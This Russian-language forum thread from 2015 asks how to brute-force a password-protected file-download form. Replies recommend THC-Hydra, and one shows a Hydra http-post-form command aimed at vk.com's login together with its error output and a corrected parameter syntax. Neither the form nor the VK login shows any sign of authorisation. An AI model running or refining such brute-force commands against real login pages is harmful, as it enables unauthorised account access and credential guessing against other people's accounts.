Брутфорс одной формы

Discussion in 'Песочница' started by risitas, 14 Jul 2015.

  1. risitas

    risitas New Member

    Joined:
    25 Jun 2015
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    <form action="getFileList.php" method="post" class="b-form">
    <p class="b-form-title"><strong>Для инвесторов</strong><br>загрузите файл проекта</p>
    <p class="b-form-inp m-pass">
    <label for="form-pass">Введите пароль</label>
    <input type="password" id="form-pass" name="" value="">
    </p>
    <p class="b-form-btn m-form1">
    <input type="submit" name="" value="Получить файл">
    </p>
    </form>

    Пробовал WBF.Gold - медленно, может и параметры неверно ввёл. Brutus тайм-аут выдает и не перебирает ничего. Подскажите какую прогу и с какими настройками юзать? и словари, если необходимо
     
  2. LORD Reigan

    LORD Reigan New Member

    Joined:
    19 Jul 2015
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Попробуй THC-Hydra использовать, насчёт параметров по гугли так на память не вспомню. Если умеешь программировать можешь сам написать брутер прошу за ранее прощение если нельзя ссылки ставить в пост.))))
     
  3. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Нет желания создавать отдельную тему, спрошу здесь т.к. вопрос касается гидры.
    Составляю запрос:
    Code:
    hydra -l "телефонный номер" -p "пароль" http-post-form://vk.com  -m '/?act=login&role=al_frame&expire=&captcha_sid=&captcha_key=&_origin=https%3A%2F%2Fvk.com&ip_h=249655bca874c10d7a&lg_h=8061bd27dd59ff0287&email=^USER^&pass=^PASS^&cookieuser=1:Вход'
    И при отправке появляется сообщение:
    "
    Code:
    Hydra (http://www.thc.org/thc-hydra) starting at 2015-09-18 18:56:10
    [ERROR] the variables argument needs at least the strings ^USER^ or ^PASS^: Вход
    Запрос верен, но если возникает ошибка, значит нет. А где копать исходную?
    Действовал по статье:
    http://webware.biz/?p=4875

    Нужно было передать данные следующим образом:
    Code:
    /index.php:uname=^USER^&pass=^PASS^&op=login&redirect=:Вход на сайт
    Но гидрой нереально брутить вк из-за отсутствия списка проксей и капчи.
     
    #3 Muracha, 18 Sep 2015
    Last edited: 18 Sep 2015